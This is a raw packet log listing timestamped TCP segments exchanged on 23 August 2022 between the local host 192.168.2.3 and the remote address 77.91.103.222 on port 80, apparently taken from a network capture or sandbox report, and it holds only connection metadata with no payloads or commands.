Aug 23, 2022 18:24:03.328802109 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328823090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328845024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328880072 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328896999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328922987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328931093 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328934908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328954935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328974962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.328991890 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.328995943 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329009056 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329040051 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329067945 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329088926 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329111099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329122066 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329125881 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329128981 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329148054 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329170942 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329195023 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329199076 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329212904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329233885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329258919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329267025 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329269886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329297066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329303980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329308033 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329328060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329349995 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329370975 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329392910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329396963 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329400063 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329412937 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329420090 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329442024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329462051 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329474926 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329497099 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329516888 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329520941 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329530954 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329560041 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329592943 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.329603910 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329608917 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329639912 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.329643011 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.333555937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.333583117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.333600044 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.333621025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.333645105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.333662987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.333679914 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.333704948 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.333712101 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.333715916 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.333719969 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.345860004 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.345921040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.345947981 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.345976114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346004009 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346045017 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346055984 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346074104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346101999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346129894 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346136093 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346139908 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346153021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346182108 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346210003 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346223116 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346229076 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346255064 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346283913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346311092 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346317053 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346345901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346374989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346400976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346416950 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346430063 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346460104 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346487045 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346503019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346508980 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346532106 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346560955 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346587896 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346594095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346610069 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346637011 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346666098 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346678972 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346683979 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346688032 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346714020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346740007 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346766949 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346779108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346784115 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346787930 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346813917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346842051 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346868992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346883059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346889019 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346893072 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346920013 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346947908 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.346960068 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.346978903 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347006083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347033024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347045898 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347052097 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347079039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347106934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347136974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347157955 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347165108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347168922 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347187996 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347214937 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347242117 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347255945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347260952 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347265005 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347292900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347321987 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347373962 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347388983 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347394943 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347398996 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347423077 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.347451925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347481966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347503901 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347524881 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347544909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347567081 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347589016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347609997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347630978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347655058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347704887 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347731113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347750902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347771883 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347796917 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347820997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347841978 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347862005 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347883940 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347904921 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347975969 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.347997904 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348018885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348041058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348076105 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348095894 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348118067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348156929 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348179102 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348201990 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348223925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348244905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348265886 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348287106 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348309040 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348330021 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348352909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348376036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348397970 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348421097 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348442078 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348463058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348484039 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348505974 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348551989 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348654985 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348685026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.348793030 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.348917961 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.364418983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.364582062 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.367734909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.368304968 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.370575905 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.370609999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.370631933 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.370655060 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.370676994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.370707035 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.370718002 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.370726109 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.370748997 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.370803118 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.370807886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.370810986 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372088909 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372112036 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372128963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372149944 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372176886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372181892 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372200966 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372222900 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372240067 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372256994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372273922 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372292995 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372296095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372304916 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372322083 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372338057 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372359991 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372381926 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372385979 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372387886 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372415066 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372432947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372450113 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372469902 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372477055 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372481108 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372498989 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372519016 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372535944 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372545004 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372549057 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372564077 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372585058 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372603893 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372617960 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372621059 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372633934 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372651100 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372668982 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372677088 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372679949 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372682095 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372697115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372708082 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372725010 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372742891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372760057 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372775078 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372777939 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372781038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372790098 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372807980 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372823954 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372834921 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372838020 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372839928 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372853994 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372872114 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372879982 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372883081 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372908115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372925043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372942924 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372952938 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372956038 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372957945 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.372973919 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.372991085 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373007059 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373017073 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.373020887 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.373023033 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.373040915 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373059988 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373083115 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373085976 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.373090029 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.373091936 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.373107910 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373120070 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373131990 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373143911 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373157024 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373167992 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373179913 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373193026 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373204947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373231888 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373244047 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373262882 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373303890 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373322964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373334885 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373364925 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373377085 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373395920 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373408079 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373420000 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373461008 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373485088 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373497963 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373522043 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373533964 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373544931 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373579025 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373590946 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373610020 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373621941 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373641014 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373652935 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373682976 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373702049 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373725891 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373738050 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373882055 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373898983 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373928070 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.373945951 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373964071 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373980999 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.373996973 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374012947 CEST	80	49844	77.91.103.222	192.168.2.3
Aug 23, 2022 18:24:03.374022007 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374025106 CEST	49844	80	192.168.2.3	77.91.103.222
Aug 23, 2022 18:24:03.374026060 CEST	49844	80	192.168.2.3	77.91.103.222
